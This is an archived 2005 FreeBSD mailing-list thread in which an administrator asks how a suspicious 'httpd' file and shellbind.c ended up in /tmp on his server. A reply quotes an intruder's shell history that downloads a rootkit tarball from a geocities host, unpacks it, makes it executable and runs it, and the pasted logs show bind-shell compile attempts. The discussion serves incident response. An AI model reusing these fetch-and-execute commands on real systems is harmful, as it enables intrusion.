From owner-freebsd-questions@FreeBSD.ORG Wed Feb 9 17:41:43 2005 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6793B16A4D2 for ; Wed, 9 Feb 2005 17:41:43 +0000 (GMT) Received: from casbah.it.northwestern.edu (casbah.it.northwestern.edu [129.105.16.52]) by mx1.FreeBSD.org (Postfix) with ESMTP id D88A443D4C for ; Wed, 9 Feb 2005 17:41:42 +0000 (GMT) (envelope-from bret-walker@northwestern.edu) Received: (from mailnull@localhost) by casbah.it.northwestern.edu (8.12.10/8.12.10) id j19Hfgk9020412; Wed, 9 Feb 2005 11:41:42 -0600 (CST) Received: from medillbwpc (medill-bwpc.medill.northwestern.edu [129.105.51.23]) by casbah.it.northwestern.edu via smap (V2.0) id xma019386; Wed, 9 Feb 05 11:41:26 -0600 From: "Bret Walker" To: "'Oliver Leitner'" , Date: Wed, 9 Feb 2005 11:41:26 -0600 Message-ID: <042101c50ece$944bbad0$17336981@medill.northwestern.edu> X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.6626 MIME-Version: 1.0 In-Reply-To: <20050209145353.304EC43D49@mx1.FreeBSD.org> Importance: Normal Content-Type: multipart/signed; micalg=SHA1; protocol="application/x-pkcs7-signature"; boundary="----=_NextPart_000_041D_01C50E9C.4983F940" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Subject: RE: httpd in /tmp - Sound advice sought X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 09 Feb 2005 17:41:43 -0000 This is a multi-part message in MIME format. ------=_NextPart_000_041D_01C50E9C.4983F940 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Thanks for letting me know. I found this in the my httpd error log: [Fri Jan 14 13:06:06 2005] [error] [client 129.xxx.xxx.xxx] File does not exist: /usr/local/www/data/favicon.ico wget: permission denied ./httpd: not found shellbind.c: In function `main': shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast shellbind.c: In function `main': shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast ./httpd: permission denied ./httpd: permission denied shellbind.c: In function `main': shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast ./httpd: permission denied shellbind.c: In function `main': shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast ./httpd: permission denied shellbind.c: In function `main': shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast [Fri Jan 14 21:40:12 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy [Fri Jan 14 21:40:21 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy [Sat Jan 15 21:36:33 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy [Sun Jan 16 21:54:06 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy [Sun Jan 16 23:58:22 2005] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer (errno: 54) I also found shellbind.c in my /tmp directory. Is there a way to tell what type of exploit was used to get these files on my system (ie OpenSSL / PHP register_globals)? I've been monitoring this server from a port that mirrors its traffic using Ethereal, and all seems to be okay now. I also cvsuped -Rr my apache+mod_ssl install. Thanks, Bret -----Original Message----- From: owner-freebsd-questions@freebsd.org [mailto:owner-freebsd-questions@freebsd.org] On Behalf Of Oliver Leitner Sent: Wednesday, February 09, 2005 8:48 AM To: Bret Walker; freebsd-questions@freebsd.org Subject: Re: httpd in /tmp - Sound advice sought i know a certain hacking group who is trying to run their trojan as httpd, i discovered that info through some shell account i am running, that has tried to start this rootkit on our machine. heres a short view from the shell's history: --------------------- wget geocities.com/setan_maya/taek.tar.gz cd .. ls cd .. ls cd tmp ls wget geocities.com/setan_maya/taek.tar.gz tar zxvf taek.tar.gz ls cd taek ./httpd chmod 755 httpd ./httpd ls cd .. rm -rf taek rm taek.tar.gz ----------------------- this clearly shows, that we have to do with a very dumb person, hence he 1. didnt cleaned his historyfile 2. left the tar.gz file in his homedir 3. loaded the rootkit from the same server he is running the group's webpage on. 4. has a link to their chan on that page, and in the chan as ive monitored for 48hrs, ive found them posting their "successes" directly and unencrypted. I have informed a number of providers and hosters, that had their webpage posted into that chan, and informed them about the breakins, so far i got no message back from them. of course, its a longshot, but they didnt seem to check first if the folder tmp has the executable bit set at all, and they named their client like the file youve found. i hope this helps you further. Greetings Oliver Leitner Technical Staff http://www.shells.at On Tuesday 08 February 2005 14:35, Bret Walker wrote: > Last night, I ran chkrootkit and it gave me a warning about being > infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up > to version 0.96d or older on Linux systems. I have only run 0.97d. > The file that set chkrootkit off was httpd which was located in /tmp. > /tmp is always mounted rw, noexec. > > I update my packages (which are installed via ports) any time there is > a security update. I'm running Apache 1.3.33/PHP 4.3.10/mod_ssl > 2.8.22/OpenSSL 0.97d on 4.10. Register_globals was on in PHP for a > couple of weeks, but the only code that required it to be on was in a > .htaccess/SSL password protected directory. > > Tripwire didn't show anything that I noted as odd. I reexamined the > tripwire logs, which are e-mailed to an account off of the machine > immediately after completion, and I don't > see anything odd for the 3/4 days before or after the date on the file. > (I don't scan /tmp) > > I stupidly deleted the httpd file from /tmp, which was smaller than > the actual apache httpd. And I don't back up /tmp. > > The only info I can find regarding this file being in /tmp pertains to > Slapper. Could something have copied a file there? Could I have done > it by mistake at some point - the server's been up ~60 days, plenty of > time for me to forget something? > > This is production box that I very much want to keep up, so I'm > seeking some sound advice. > > Does this box need to be rebuilt? How could a file get written to > /tmp, and is it an issue since it couldn't be executed? I run > tripwire nightly, and haven't seen anything odd to the best of my > recollection. I also check ipfstat -t frequently to see if any odd > connections are happening. > > I appreciate any sound advice on this matter. > > Thanks, > Bret -- By reading this mail you agree to the following: using or giving out the email address and any other info of the author of this email is strictly forbidden. By acting against this agreement the author of this mail will take possible legal actions against the abuse. _______________________________________________ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "freebsd-questions-unsubscribe@freebsd.org" ------=_NextPart_000_041D_01C50E9C.4983F940 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIII2TCCAmEw ggHKoAMCAQICAwzDcDANBgkqhkiG9w0BAQQFADBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhh d3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVt YWlsIElzc3VpbmcgQ0EwHhcNMDQwNzI3MjMwMzM1WhcNMDUwNzI3MjMwMzM1WjBOMR8wHQYDVQQD ExZUaGF3dGUgRnJlZW1haWwgTWVtYmVyMSswKQYJKoZIhvcNAQkBFhxicmV0LXdhbGtlckBub3J0 aHdlc3Rlcm4uZWR1MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCr2KxZcyBLN/M2+Shau42D HRCTwrVNq2aB3ke9Ulo5GCzJMgZeLPK9WeY6GEbri7OUdF7tH/FS8qCrFCXHcUwJnMx0Ifa6ILMC YRvH3H8u8W3Q4QinnVPGUwx84VDg0rFpQf79F/BS4MofBMcsucO/F1t/linKZgMvq0vOgKoP6QID AQABozkwNzAnBgNVHREEIDAegRxicmV0LXdhbGtlckBub3J0aHdlc3Rlcm4uZWR1MAwGA1UdEwEB /wQCMAAwDQYJKoZIhvcNAQEEBQADgYEAXonUId4OXjTXG19LKdWZ7cd4LcEtJlnFan5nwj2P1p+a bEd4doxkueYJ9u4+Thn633uqHR1v1CTPuTVSt5sGXKcSG8fUeaITE0lamDOKU6lqtc0S5+/0/5tb GCcmSp02WaLAatE9Iy8OY4NmGcR2oqHx05nYSwNB50UqOBNa4ZMwggMtMIIClqADAgECAgEAMA0G CSqGSIb3DQEBBAUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYD VQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0 aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJl ZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcN OTYwMTAxMDAwMDAwWhcNMjAxMjMxMjM1OTU5WjCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3VsdGlu ZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhh d3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFp bEB0aGF3dGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUadfUsJRkW3HpR9gMUbbq cpGwhF59LQ2PexLfhSV1KHQ6QixjJ5+Ve0vvfhmHHYbqo925zpZkGsIUbkSsfOaP6E0PcR9AOKYA o4d49vmUhl6t6sBeduvZFKNdbnp8DKVLVX8GGSl/npom1Wq7OCQIapjHsdqjmJH9edvlWsQcuQID AQABoxMwETAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBBAUAA4GBAMfskn5O+PWWpWdiKqTw TRFg0G+NYFhhrCa7UjVcCM8w+6hKloofYkIjjBcP9LpknBesRynfnZhe0mxgcVyirNx54+duAEcf tQ0o6AKd5Jr9E/Sm2Xyx+NxfIyYJkYBz0BQb3kOpgyXy5pwvFcr+pquKB3WLDN1RhGvk+NHOd6KB MIIDPzCCAqigAwIBAgIBDTANBgkqhkiG9w0BAQUFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgT DFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3Vs dGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMb VGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVl bWFpbEB0aGF3dGUuY29tMB4XDTAzMDcxNzAwMDAwMFoXDTEzMDcxNjIzNTk1OVowYjELMAkGA1UE BhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1Ro YXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB iQKBgQDEpjxVc1X7TrnKmVoeaMB1BHCd3+n/ox7svc31W/Iadr1/DDph8r9RzgHU5VAKMNcCY1os iRVwjt3J8CuFWqo/cVbLrzwLB+fxH5E2JCoTzyvV84J3PQO+K/67GD4Hv0CAAmTXp6a7n2XRxSpU hQ9IBH+nttE8YQRAHmQZcmC3+wIDAQABo4GUMIGRMBIGA1UdEwEB/wQIMAYBAf8CAQAwQwYDVR0f BDwwOjA4oDagNIYyaHR0cDovL2NybC50aGF3dGUuY29tL1RoYXd0ZVBlcnNvbmFsRnJlZW1haWxD QS5jcmwwCwYDVR0PBAQDAgEGMCkGA1UdEQQiMCCkHjAcMRowGAYDVQQDExFQcml2YXRlTGFiZWwy LTEzODANBgkqhkiG9w0BAQUFAAOBgQBIjNFQg+oLLswNo2asZw9/r6y+whehQ5aUnX9MIbj4Nh+q LZ82L8D0HFAgk3A8/a3hYWLD2ToZfoSxmRsAxRoLgnSeJVCUYsfbJ3FXJY3dqZw5jowgT2Vfldr3 94fWxghOrvbqNOUQGls1TXfjViF4gtwhGTXeJLHTHUb/XV9lTzGCAs8wggLLAgEBMGkwYjELMAkG A1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMT I1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBAgMMw3AwCQYFKw4DAhoFAKCCAbww GAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMDUwMjA5MTc0MTI2WjAj BgkqhkiG9w0BCQQxFgQUx9Tp7N0F4EuxiKSUXcKAb7yydkMwZwYJKoZIhvcNAQkPMVowWDAKBggq hkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAwBwYFKw4DAgcwDQYIKoZIhvcN AwICASgwBwYFKw4DAhowCgYIKoZIhvcNAgUweAYJKwYBBAGCNxAEMWswaTBiMQswCQYDVQQGEwJa QTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3Rl IFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECAwzDcDB6BgsqhkiG9w0BCRACCzFroGkwYjEL MAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNV BAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBAgMMw3AwDQYJKoZIhvcNAQEB BQAEgYAvphqc0QhNsDlXBG/e+erTJ8cY2JHFLQimYqbTpn1MVIQSQwFWy/PFgFJz+YFPWihMQJ0X lfMBnJPZtbpDa73DXGNg3uccXIVtH0QIkLqJAuMloFxqulXKvxsMnYIRew4mctCq+M5N//TJmEP5 SaZbNxYHK/lHVIEt7cnI9FHrIQAAAAAAAA== ------=_NextPart_000_041D_01C50E9C.4983F940--